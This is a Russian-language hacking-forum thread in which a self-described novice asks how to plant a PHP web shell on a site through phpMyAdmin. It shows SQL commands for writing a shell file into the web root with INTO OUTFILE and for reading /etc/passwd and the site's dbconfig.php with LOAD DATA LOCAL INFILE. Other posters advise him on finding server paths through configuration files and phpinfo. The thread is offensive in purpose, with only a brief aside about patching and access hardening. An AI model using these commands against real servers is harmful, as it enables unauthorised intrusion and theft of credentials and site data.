PDA

Просмотр полной версии : Как залить шелл через PMA?


Edward007
24.12.2015, 20:49
Вообщем дело такое, я уже и гуглил, и у знакомых спрашивал, никто ничего не знает.

Возможно ли как-то разрешить File_priv через саму бд?

Выполняю запрос: SELECT shell FROM `shell` INTO OUTFILE '/blablabla/data/www/site.ru.su/22.php';

И скули выбивает ошибку: #1045 - Access denied for user 'shopsof'@'%' (using password: YES)

Можно ли что-то сделать в этой ситуации?

faza02
25.12.2015, 00:43
думаю, нет. максимум, что возможно - чтение файлов: https://rdot.org/forum/showthread.php?t=741

Edward007
25.12.2015, 00:54
Очень жаль :С

Edward007
25.12.2015, 00:57
yarbabin said:
↑ (https://antichat.live/posts/3931835/)
думаю, нет. максимум, что возможно - чтение файлов:
https://rdot.org/forum/showthread.php?t=741


Я новичок в этой сфере, не понимаю что делать дальше.

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'

Выдало:

Добавлено 2 строки.

Идентификатор вставленной строки: 945 ( Запрос занял 0.0004 сек. )

Что дальше?

faza02
25.12.2015, 11:39
таблицу test посмотрите

Edward007
25.12.2015, 12:06
yarbabin said:
↑ (https://antichat.live/posts/3931965/)
таблицу test посмотрите


Вбил так:

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'

Зашел в табл, там такое:

http://i.imgur.com/YBBXi0U.png

Пытаюсь dbconfig.php открыть:

LOAD DATA LOCAL INFILE '/www/xxx.su/engine/data/dbconfig.php' INTO TABLE test FIELDS TERMINATED BY '\n'

Скули выбивает:

#2 - File '/www/xxx.su/engine/data/dbconfig.php' not found (Errcode: 2 "No such file or directory")

Что делать?

faza02
25.12.2015, 19:16
в ошибке вам говорят, что путь неверный. ищите пути. раскрытие, чтение конфигов веб-серера, вот это все

5maks5
25.12.2015, 20:13
Шел 2015 год, PHP 7 лежал в репозитории на GitHub, а люди все еще использовали MySQL 5.5 с FILE_PRIV=Y.

К чему это я?

Где вы откапываете этих мастодонтов?

faza02
25.12.2015, 20:50
да кому это интересно - апдейты делать?

Edward007
25.12.2015, 21:21
yarbabin said:
↑ (https://antichat.live/posts/3932171/)
в ошибке вам говорят, что путь неверный. ищите пути. раскрытие, чтение конфигов веб-серера, вот это все


Можно пример, как можно найти пути?

В этой сфере я слаб...

faza02
26.12.2015, 04:35
смотря какой веб-сервер. гуглите, все это много раз встречалось здесь, а в интернете и того чаще

5maks5
26.12.2015, 11:30
yarbabin said:
↑ (https://antichat.live/posts/3932224/)
да кому это интересно - апдейты делать?


Даже если лень следить за актуальностью программного обеспечения, необходимо правильно настроить права доступа, ну и как минимум прописать .htpasswd

Ну и замена бажному PMA давно известна - консоль & adminer.

psihoz26
31.12.2015, 01:15
5maks5 said:
↑ (https://antichat.live/posts/3932395/)
Даже если лень следить за актуальностью программного обеспечения, необходимо правильно настроить права доступа, ну и как минимум прописать .htpasswd
Ну и замена бажному PMA давно известна - консоль & adminer.


В пма бывает пхпинфо а там document_root видно

Edward007
01.01.2016, 18:04
psihoz26 said:
↑ (https://antichat.live/posts/3934377/)
В пма бывает пхпинфо а там document_root видно


Где именно?

psihoz26
03.01.2016, 12:34
Edward007 said:
↑ (https://antichat.live/posts/3934817/)
Где именно?


/phpmyadmin/phpinfo.php?token=%валидный токен%

вроде так

Edward007
03.01.2016, 13:23
psihoz26 said:
↑ (https://antichat.live/posts/3935481/)
/phpmyadmin/phpinfo.php?token=%валидный токен%
вроде так


Захожу в pma, пишу так: sitepma.ru/phpinfo.php?token=Тут_мой_валидный_ окен

И меня перекидывает на авторизацию... Т.е сбрасывается авторизация.